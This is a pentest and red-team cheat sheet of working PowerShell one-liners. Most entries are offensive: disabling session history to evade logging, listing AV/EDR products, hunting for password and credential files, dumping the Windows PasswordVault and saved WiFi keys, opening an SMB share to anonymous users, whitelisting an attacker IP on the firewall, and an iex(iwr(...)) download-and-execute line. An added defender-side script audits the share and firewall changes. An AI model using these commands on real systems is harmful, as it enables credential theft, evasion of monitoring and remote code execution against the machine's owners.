Created April 12, 2023 20:51
Useful PowerShell commands for Pentest / Red Team
------------------------------------------------------------------------
..:: A few PowerShell commands - Useful for Pentest & Red Team ::..
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
------------------------------------------------------------------------------
## Disable logging (history) of the commands of the current PowerShell session ##
------------------------------------------------------------------------------
PS C:\Users\Thibow> Set-PSReadlineOption -HistorySaveStyle SaveNothing
Or ...
PS C:\Users\Thibow> Remove-Module PSReadline
-------------------------------------------------------
## List the AV / EDR products running on the endpoint ##
-------------------------------------------------------
PS C:\Users\Thibow> Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct
------------------------------------------------
## Silently search for documents, recursively ##
------------------------------------------------
PS C:\Users\Thibow> gci C:\Users\ -Include *pass*.txt,*pass*.xml,*pass*.ini,*pass*.xlsx,*cred*,*vnc*,*.config*,*accounts* -File -Recurse -EA SilentlyContinue
----------------------------------------------------------------------
## Search configuration files containing the keyword "password" ##
----------------------------------------------------------------------
PS C:\Users\Thibow> gci C:\Users\ -Include *.txt,*.xml,*.config,*.conf,*.cfg,*.ini -File -Recurse -EA SilentlyContinue | Select-String -Pattern "password"
-----------------------------------------------------------
## Search for passwords in database configuration files ##
-----------------------------------------------------------
PS C:\Users\Thibow> gci C:\ -Include *.config,*.conf,*.xml -File -Recurse -EA SilentlyContinue | Select-String -Pattern "connectionString"
-------------------------------------------------------
## Extract passwords from the Windows PasswordVault ##
-------------------------------------------------------
PS C:\Users\Thibow> [Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];(New-Object Windows.Security.Credentials.PasswordVault).RetrieveAll() | % { $_.RetrievePassword();$_ }
-------------------------------------------------------
## Retrieve the WiFi passwords saved on the endpoint ##
-------------------------------------------------------
# FR version (French-localized netsh output) #
PS C:\Users\Thibow> (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Contenu de la clé\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize
# EN version (English netsh output) #
PS C:\Users\Thibow> (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize
-------------------------------------------------
## Change the MAC address of a network adapter ##
-------------------------------------------------
PS C:\Users\Thibow> Set-NetAdapter -Name "Ethernet0" -MacAddress "00-01-18-57-1B-0D"
-------------------------------------------------------------
## Create an SMB shared directory accessible to everybody ##
-------------------------------------------------------------
PS C:\Users\Thibow> new-item "C:\Users\prout\" -itemtype directory
PS C:\Users\Thibow> New-SmbShare -Name "sharedir" -Path "C:\Users\prout\" -FullAccess "Everyone","Guests","Anonymous Logon"
-------------------------------------------------------------------------------------
## Whitelist an IP address on the local Windows firewall (allowed on all ports) ##
-------------------------------------------------------------------------------------
PS C:\Users\Thibow> New-NetFirewallRule -Action Allow -DisplayName "pentest" -RemoteAddress 10.10.15.123
// Remove the rule ::
PS C:\Users\Thibow> Remove-NetFirewallRule -DisplayName "pentest"
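Added audit script, not part of the gist: from the defender's side it reports the two host changes made in the SMB share and firewall sections above, shares granting Full access to Everyone / Guests / Anonymous Logon and enabled inbound Allow rules with no port restriction but a specific remote address. It assumes an elevated session and principal names as displayed on an English Windows.

```powershell
# Added audit script (not from the gist). Assumes an elevated PowerShell session
# and English principal names as returned by Get-SmbShareAccess.
$broadPrincipals = @('Everyone', 'NT AUTHORITY\ANONYMOUS LOGON',
                     'Anonymous Logon', 'BUILTIN\Guests', 'Guests')

Write-Host "== SMB shares granting Full access to broad principals =="
# Skip the administrative shares (C$, ADMIN$, IPC$), look at every other share's ACL.
Get-SmbShare | Where-Object { $_.Name -notmatch '\$$' } | ForEach-Object {
    $share = $_
    Get-SmbShareAccess -Name $share.Name | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $_.AccessRight -eq 'Full' -and
        ($broadPrincipals -contains $_.AccountName)
    } | ForEach-Object {
        [PSCustomObject]@{
            Share     = $share.Name
            Path      = $share.Path
            Principal = $_.AccountName
        }
    }
} | Format-Table -AutoSize

Write-Host "== Enabled inbound Allow rules: any protocol/port, specific remote address =="
Get-NetFirewallRule -Enabled True -Direction Inbound -Action Allow | ForEach-Object {
    $rule = $_
    $port = $rule | Get-NetFirewallPortFilter      # Protocol / LocalPort of the rule
    $addr = $rule | Get-NetFirewallAddressFilter   # RemoteAddress of the rule
    # A rule created with only -Action Allow -RemoteAddress matches this shape.
    if ($port.Protocol -eq 'Any' -and $port.LocalPort -eq 'Any' -and $addr.RemoteAddress -ne 'Any') {
        [PSCustomObject]@{
            Rule    = $rule.DisplayName
            Remote  = ($addr.RemoteAddress -join ',')
            Profile = $rule.Profile
        }
    }
} | Format-Table -AutoSize
```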
-----------------------------------
## Download and execute a file ##
-----------------------------------
PS C:\Users\Thibow> iex(iwr("https://UrlDuFichier/123.exe"))
iwr == Invoke-WebRequest
iex == Invoke-Expression (runs the downloaded response body as PowerShell script text)
---------------------------------------
## Get the SID of the current user ##
---------------------------------------
PS C:\Users\Thibow> ([System.Security.Principal.WindowsIdentity]::GetCurrent()).User.Value